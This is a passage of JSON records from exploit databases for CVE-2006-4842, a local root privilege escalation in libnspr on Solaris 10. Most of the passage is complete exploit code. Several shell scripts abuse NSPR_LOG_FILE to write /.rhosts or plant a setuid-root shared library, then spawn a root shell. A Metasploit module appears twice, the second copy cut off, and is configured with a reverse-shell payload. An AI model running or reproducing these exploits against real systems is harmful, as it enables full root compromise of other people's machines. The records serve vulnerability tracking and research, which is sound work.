-ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n# milw0rm.com [2006-10-24]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2641/"}, {"lastseen": "2016-02-03T08:55:56", "description": "Sun Solaris Netscape Portable Runtime API 4.6.1 Local Privilege Escalation Vulnerability (1). CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-13T00:00:00", "type": "exploitdb", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-13T00:00:00", "id": "EDB-ID:28788", "href": "https://www.exploit-db.com/exploits/28788/", "sourceData": "source: http://www.securityfocus.com/bid/20471/info\r\n\r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n\r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n\r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr,v 1.1 2006/10/13 19:12:12 raptor Exp $\r\n#\r\n# raptor_libnspr - Solaris 10 libnspr oldschool local root\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. 
Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr\r\n# $ ./raptor_libnspr\r\n# [...]\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # \r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n# \r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr - Solaris 10 libnspr oldschool local root\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/.rhosts\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme rw-rw-rw!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# oldschool rhosts foo;)\r\necho \"+ +\" > $NSPR_LOG_FILE\r\nrsh -l root localhost sh -i\r\n\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28788/"}, {"lastseen": "2016-02-03T08:56:04", "description": "Sun Solaris Netscape Portable Runtime API 4.6.1 Local Privilege Escalation Vulnerability (2). CVE-2006-4842. 
Local exploit for solaris platform", "published": "2006-10-24T00:00:00", "type": "exploitdb", "title": "Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-24T00:00:00", "id": "EDB-ID:28789", "href": "https://www.exploit-db.com/exploits/28789/", "sourceData": "source: http://www.securityfocus.com/bid/20471/info\r\n \r\nThe Netscape Portable Runtime API running on Sun Solaris 10 operating system is prone to a local privilege-escalation vulnerability.\r\n \r\nA successful exploit of this issue allows an attacker to gain superuser privileges, completely compromising the affected computer. \r\n \r\nVersion 4.6.1 running on Sun Solaris 10 is vulnerable to this issue.\r\n\r\n#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr3,v 1.1 2006/10/24 15:54:57 raptor Exp $\r\n#\r\n# raptor_libnspr3 - Solaris 10 libnspr constructor exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of \r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to \r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Yet another newschool version of the local root exploit: this time we place\r\n# our code in the global constructor (ctors) for the library, as suggested by\r\n# gera. This way, we don't have to hide a real function and we have a generic\r\n# library that can be used in all exploits like this. 
To avoid annoying side-\r\n# effects, i use trusted directories and LD_LIBRARY_PATH instead of replacing\r\n# a library in the default search path.\r\n#\r\n# See also:\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n# http://www.0xdeadbeef.info/exploits/raptor_libnspr2\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr3\r\n# $ ./raptor_libnspr3\r\n# [...]\r\n# Sun Microsystems Inc. SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=1(other)\r\n# # rm /usr/lib/secure/libldap.so.5\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr3 - Solaris 10 libnspr constructor exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/libldap.so.5\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/sbin/lpmove\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"void __attribute__ ((constructor)) cons() {\" > /tmp/ctors.c\r\necho \" setuid(0);\" >> /tmp/ctors.c\r\necho \" execle(\\\"/bin/ksh\\\", \\\"ksh\\\", 0, 0);\" >> /tmp/ctors.c\r\necho \"}\" >> /tmp/ctors.c\r\ngcc -fPIC -g -O2 -shared -o /usr/lib/secure/libldap.so.5 /tmp/ctors.c -lc\r\nif [ $? 
-ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_LIBRARY_PATH foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_LIBRARY_PATH=/usr/lib/secure su -\r\n\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/28789/"}, {"lastseen": "2016-01-31T16:34:17", "description": "Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit. CVE-2006-4842. Local exploit for solaris platform", "published": "2006-10-16T00:00:00", "type": "exploitdb", "title": "Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2006-10-16T00:00:00", "id": "EDB-ID:2569", "href": "https://www.exploit-db.com/exploits/2569/", "sourceData": "#!/bin/sh\r\n\r\n#\r\n# $Id: raptor_libnspr2,v 1.4 2006/10/16 11:50:48 raptor Exp $\r\n#\r\n# raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\r\n# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\r\n#\r\n# Local exploitation of a design error vulnerability in version 4.6.1 of\r\n# NSPR, as included with Sun Microsystems Solaris 10, allows attackers to\r\n# create or overwrite arbitrary files on the system. The problem exists \r\n# because environment variables are used to create log files. Even when the\r\n# program is setuid, users can specify a log file that will be created with \r\n# elevated privileges (CVE-2006-4842).\r\n#\r\n# Newschool version of local root exploit via LD_PRELOAD (hi KF!). Another\r\n# possible (but less l33t;) attack vector is /var/spool/cron/atjobs.\r\n#\r\n# See also: http://www.0xdeadbeef.info/exploits/raptor_libnspr\r\n#\r\n# Usage:\r\n# $ chmod +x raptor_libnspr2\r\n# $ ./raptor_libnspr2\r\n# [...]\r\n# Sun Microsystems Inc. 
SunOS 5.10 Generic January 2005\r\n# # id\r\n# uid=0(root) gid=0(root)\r\n# # rm /usr/lib/secure/getuid.so\r\n# #\r\n#\r\n# Vulnerable platforms (SPARC):\r\n# Solaris 10 without patch 119213-10 [tested]\r\n#\r\n# Vulnerable platforms (x86):\r\n# Solaris 10 without patch 119214-10 [untested]\r\n#\r\n\r\necho \"raptor_libnspr2 - Solaris 10 libnspr LD_PRELOAD exploit\"\r\necho \"Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>\"\r\necho\r\n\r\n# prepare the environment\r\nNSPR_LOG_MODULES=all:5\r\nNSPR_LOG_FILE=/usr/lib/secure/getuid.so\r\nexport NSPR_LOG_MODULES NSPR_LOG_FILE\r\n\r\n# gimme -rw-rw-rw-!\r\numask 0\r\n\r\n# setuid program linked to /usr/lib/mps/libnspr4.so\r\n/usr/bin/chkey\r\n\r\n# other good setuid targets\r\n#/usr/bin/passwd\r\n#/usr/bin/lp\r\n#/usr/bin/cancel\r\n#/usr/bin/lpset\r\n#/usr/bin/lpstat\r\n#/usr/lib/lp/bin/netpr\r\n#/usr/lib/sendmail\r\n#/usr/sbin/lpmove\r\n#/usr/bin/login\r\n#/usr/bin/su\r\n#/usr/bin/mailq\r\n\r\n# prepare the evil shared library\r\necho \"int getuid(){return 0;}\" > /tmp/getuid.c\r\ngcc -fPIC -Wall -g -O2 -shared -o /usr/lib/secure/getuid.so /tmp/getuid.c -lc\r\nif [ $? -ne 0 ]; then\r\n\techo \"problems compiling evil shared library, check your gcc\"\r\n\texit 1\r\nfi\r\n\r\n# newschool LD_PRELOAD foo;)\r\nunset NSPR_LOG_MODULES NSPR_LOG_FILE\r\nLD_PRELOAD=/usr/lib/secure/getuid.so su -\r\n\r\n# milw0rm.com [2006-10-16]\r\n", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2569/"}, {"lastseen": "2018-10-07T14:34:04", "description": "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit). CVE-2006-4842. Local exploit for Solaris platform. 
Tags: Metasploit Framework (MSF), Local", "published": "2018-09-18T00:00:00", "type": "exploitdb", "title": "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2018-09-18T00:00:00", "id": "EDB-ID:45433", "href": "https://www.exploit-db.com/exploits/45433/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Solaris::Priv\r\n include Msf::Post::Solaris::System\r\n include Msf::Post::Solaris::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Solaris libnspr NSPR_LOG_FILE Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file write vulnerability in the\r\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\r\n prior to Solaris 10u3 which allows users to gain root privileges.\r\n\r\n libnspr versions prior to 4.6.3 allow users to specify a log file with\r\n the `NSPR_LOG_FILE` environment variable. 
The log file is created with\r\n the privileges of the running process, resulting in privilege escalation\r\n when used in combination with a SUID executable.\r\n\r\n This module writes a shared object to the trusted library directory\r\n `/usr/lib/secure` and runs the specified SUID binary with the shared\r\n object loaded using the `LD_LIBRARY_PATH` environment variable.\r\n\r\n This module has been tested successfully with libnspr version 4.5.1\r\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\r\n },\r\n 'References' =>\r\n [\r\n ['BID', '20471'],\r\n ['CVE', '2006-4842'],\r\n ['EDB', '2543'],\r\n ['EDB', '2569'],\r\n ['EDB', '2641'],\r\n ['URL', 'https://securitytracker.com/id/1017050'],\r\n ['URL', 'https://securitytracker.com/id/1017051'],\r\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\r\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\r\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'iDefense', # Discovery\r\n 'Marco Ivaldi', # Exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 11 2006',\r\n 'Privileged' => true,\r\n 'Platform' => ['solaris'],\r\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\r\n 'Targets' => [['Auto', {}]],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n # Some useful example SUID executables:\r\n # * /usr/bin/cancel\r\n # * /usr/bin/chkey\r\n # * /usr/bin/lp\r\n # * /usr/bin/lpset\r\n # * /usr/bin/lpstat\r\n # * /usr/lib/lp/bin/netpr\r\n # * /usr/sbin/lpmove\r\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of 
libnspr4.so)', '/usr/bin/cancel'])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def suid_bin_path\r\n datastore['SUID_PATH']\r\n end\r\n\r\n def is_writable?(path)\r\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\r\n end\r\n\r\n def mkdir(path)\r\n vprint_status \"Creating directory '#{path}'\"\r\n cmd_exec \"mkdir -p '#{path}'\"\r\n register_dir_for_cleanup path\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n end\r\n\r\n def check\r\n unless setuid? suid_bin_path\r\n vprint_error \"#{suid_bin_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{suid_bin_path} is setuid\"\r\n\r\n unless has_gcc?\r\n vprint_error 'gcc is not installed'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\r\n # Earlier versions may also be vulnerable\r\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\r\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\r\n if libnspr_pkg_version.to_s.eql? 
''\r\n vprint_error 'Could not determine libnspr version'\r\n return CheckCode::Unknown\r\n end\r\n\r\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\r\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\r\n\r\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\r\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\r\n # however third-party software may also introduce a vulnerable version of the library.\r\n version = kernel_release\r\n if version.to_s.eql? ''\r\n vprint_error 'Could not determine Solaris version'\r\n return CheckCode::Detected\r\n end\r\n\r\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\r\n vprint_error \"Solaris version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\r\n\r\n # The vulnerability was patched in various Solaris patches for different platforms.\r\n # For more information, see:\r\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n installed_patches = cmd_exec 'showrev -p'\r\n [\r\n 119214, # Solaris 10 (x86) patch 119214-10\r\n 119213, # Solaris 10 (SPARC) patch 119213-10\r\n 119212, # Solaris 9 (x86) patch 119212-10\r\n 119211, # Solaris 9 (SPARC) patch 119211-10\r\n 119209 # Solaris 8 (SPARC) patch 119209-10\r\n ].each do |patch|\r\n if installed_patches =~ / #{patch}-(\\d+)/\r\n revision = $1.to_i\r\n if revision >= 10\r\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\r\n return CheckCode::Safe\r\n end\r\n end\r\n end\r\n vprint_good 'Solaris patches are not installed'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless 
[CheckCode::Detected, CheckCode::Appears].include? check\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n unless is_writable? datastore['WritableDir']\r\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\r\n end\r\n\r\n # Create writable file in /usr/lib/secure\r\n lib_path = '/usr/lib/secure'\r\n lib_name = 'libldap.so.5'\r\n\r\n vprint_status \"Creating file #{lib_path}/#{lib_name}\"\r\n cmd_exec 'umask 0'\r\n cmd_exec \"NSPR_LOG_MODULES=all:5 NSPR_LOG_FILE=\\\"#{lib_path}/#{lib_name}\\\" #{suid_bin_path}\"\r\n cmd_exec \"NSPR_LOG_FILE=#{lib_path}/#{lib_name} #{suid_bin_path}\"\r\n cmd_exec 'umask 022'\r\n\r\n unless is_writable? \"#{lib_path}/#{lib_name}\"\r\n fail_with Failure::Unknown, \"Could not create file '#{lib_path}/#{lib_name}'\"\r\n end\r\n\r\n print_good \"Created file #{lib_path}/#{lib_name}\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and compile shared object\r\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\r\n mkdir base_path\r\n\r\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\r\n payload_path = \"#{base_path}/#{payload_name}\"\r\n\r\n so = <<-EOF\r\n void __attribute__((constructor)) cons() {\r\n setuid(0);\r\n setgid(0);\r\n execle(\"#{payload_path}\", \"\", 0, 0);\r\n _exit(0);\r\n }\r\n EOF\r\n\r\n so_name = \".#{rand_text_alphanumeric 5..10}\"\r\n so_path = \"#{base_path}/#{so_name}\"\r\n upload_and_compile so_path, so\r\n\r\n vprint_status \"Writing shared object #{lib_path}/#{lib_name}\"\r\n cmd_exec \"cp '#{so_path}' '#{lib_path}/#{lib_name}'\"\r\n register_file_for_cleanup \"#{lib_path}/#{lib_name}\"\r\n\r\n # Upload and execute payload\r\n upload payload_path, generate_payload_exe\r\n cmd_exec \"chmod +x #{payload_path}\"\r\n\r\n print_status 'Executing payload...'\r\n 
cmd_exec \"LD_LIBRARY_PATH=\\\"#{lib_path}\\\" #{suid_bin_path} & echo \"\r\n end\r\nend", "cvss": {"score": 3.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45433/"}], "zdt": [{"lastseen": "2018-09-18T17:14:11", "description": "This Metasploit module exploits an arbitrary file write vulnerability in the Netscape Portable Runtime library (libnspr) on unpatched Solaris systems prior to Solaris 10u3 which allows users to gain root privileges. libnspr versions prior to 4.6.3 allow users to specify a log file with the `NSPR_LOG_FILE` environment variable. The log file is created with the privileges of the running process, resulting in privilege escalation when used in combination with a SUID executable. This Metasploit module writes a shared object to the trusted library directory `/usr/lib/secure` and runs the specified SUID binary with the shared object loaded using the `LD_LIBRARY_PATH` environment variable. This Metasploit module has been tested successfully with libnspr version 4.5.1 on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).", "edition": 1, "published": "2018-09-18T00:00:00", "title": "Solaris libnspr NSPR_LOG_FILE Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4842"], "modified": "2018-09-18T00:00:00", "id": "1337DAY-ID-31125", "href": "https://0day.today/exploit/description/31125", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Solaris::Priv\r\n include Msf::Post::Solaris::System\r\n include Msf::Post::Solaris::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Solaris libnspr 
NSPR_LOG_FILE Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits an arbitrary file write vulnerability in the\r\n Netscape Portable Runtime library (libnspr) on unpatched Solaris systems\r\n prior to Solaris 10u3 which allows users to gain root privileges.\r\n\r\n libnspr versions prior to 4.6.3 allow users to specify a log file with\r\n the `NSPR_LOG_FILE` environment variable. The log file is created with\r\n the privileges of the running process, resulting in privilege escalation\r\n when used in combination with a SUID executable.\r\n\r\n This module writes a shared object to the trusted library directory\r\n `/usr/lib/secure` and runs the specified SUID binary with the shared\r\n object loaded using the `LD_LIBRARY_PATH` environment variable.\r\n\r\n This module has been tested successfully with libnspr version 4.5.1\r\n on Solaris 10u1 (01/06) (x86) and Solaris 10u2 (06/06) (x86).\r\n },\r\n 'References' =>\r\n [\r\n ['BID', '20471'],\r\n ['CVE', '2006-4842'],\r\n ['EDB', '2543'],\r\n ['EDB', '2569'],\r\n ['EDB', '2641'],\r\n ['URL', 'https://securitytracker.com/id/1017050'],\r\n ['URL', 'https://securitytracker.com/id/1017051'],\r\n ['URL', 'https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR'],\r\n ['URL', 'http://web.archive.org/web/20061118024339/http://labs.idefense.com:80/intelligence/vulnerabilities/display.php?id=418'],\r\n ['URL', 'http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1']\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'iDefense', # Discovery\r\n 'Marco Ivaldi', # Exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Oct 11 2006',\r\n 'Privileged' => true,\r\n 'Platform' => ['solaris'],\r\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\r\n 'Targets' => [['Auto', {}]],\r\n 'SessionTypes' => ['shell', 'meterpreter'],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\r\n 'WfsDelay' => 10,\r\n 
'PrependFork' => true\r\n },\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n # Some useful example SUID executables:\r\n # * /usr/bin/cancel\r\n # * /usr/bin/chkey\r\n # * /usr/bin/lp\r\n # * /usr/bin/lpset\r\n # * /usr/bin/lpstat\r\n # * /usr/lib/lp/bin/netpr\r\n # * /usr/sbin/lpmove\r\n OptString.new('SUID_PATH', [true, 'Path to suid executable (must be linked to a vulnerable version of libnspr4.so)', '/usr/bin/cancel'])\r\n ]\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def suid_bin_path\r\n datastore['SUID_PATH']\r\n end\r\n\r\n def is_writable?(path)\r\n cmd_exec(\"[ -w #{path} ] && echo true\").include? 'true'\r\n end\r\n\r\n def mkdir(path)\r\n vprint_status \"Creating directory '#{path}'\"\r\n cmd_exec \"mkdir -p '#{path}'\"\r\n register_dir_for_cleanup path\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/ gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n end\r\n\r\n def check\r\n unless setuid? 
suid_bin_path\r\n vprint_error \"#{suid_bin_path} is not setuid\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{suid_bin_path} is setuid\"\r\n\r\n unless has_gcc?\r\n vprint_error 'gcc is not installed'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'gcc is installed'\r\n\r\n # libnspr versions 4.5.1, 4.6.1 and 4.6.2 are known to be vulnerable\r\n # Earlier versions may also be vulnerable\r\n libnspr_pkg_info = cmd_exec 'pkginfo -l SUNWpr'\r\n libnspr_pkg_version = libnspr_pkg_info.scan(/VERSION:\\s+([\\d\\.]+),/).flatten.first\r\n if libnspr_pkg_version.to_s.eql? ''\r\n vprint_error 'Could not determine libnspr version'\r\n return CheckCode::Unknown\r\n end\r\n\r\n if Gem::Version.new(libnspr_pkg_version) >= Gem::Version.new('4.6.3')\r\n vprint_error \"libnspr version #{libnspr_pkg_version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"libnspr version #{libnspr_pkg_version} appears to be vulnerable\"\r\n\r\n # Solaris 10 versions prior to the 2006 patches are known to be vulnerable.\r\n # Solaris 8 and 9 (SunOS 5.8 and 5.9) are not affected by default,\r\n # however third-party software may also introduce a vulnerable version of the library.\r\n version = kernel_release\r\n if version.to_s.eql? 
''\r\n vprint_error 'Could not determine Solaris version'\r\n return CheckCode::Detected\r\n end\r\n\r\n unless Gem::Version.new(version) <= Gem::Version.new('5.10')\r\n vprint_error \"Solaris version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\r\n\r\n # The vulnerability was patched in various Solaris patches for different platforms.\r\n # For more information, see:\r\n # - http://web.archive.org/web/20061110164829/http://sunsolve.sun.com/search/document.do?assetkey=1-26-102658-1\r\n installed_patches = cmd_exec 'showrev -p'\r\n [\r\n 119214, # Solaris 10 (x86) patch 119214-10\r\n 119213, # Solaris 10 (SPARC) patch 119213-10\r\n 119212, # Solaris 9 (x86) patch 119212-10\r\n 119211, # Solaris 9 (SPARC) patch 119211-10\r\n 119209 # Solaris 8 (SPARC) patch 119209-10\r\n ].each do |patch|\r\n if installed_patches =~ / #{patch}-(\\d+)/\r\n revision = $1.to_i\r\n if revision >= 10\r\n vprint_error \"Solaris patch #{patch}-#{revision} has been applied\"\r\n return CheckCode::Safe\r\n end\r\n end\r\n end\r\n vprint_good 'Solaris patches are not installed'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless [CheckCode::Detected, CheckCode::Appears].include? check\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n unless is_writable? 
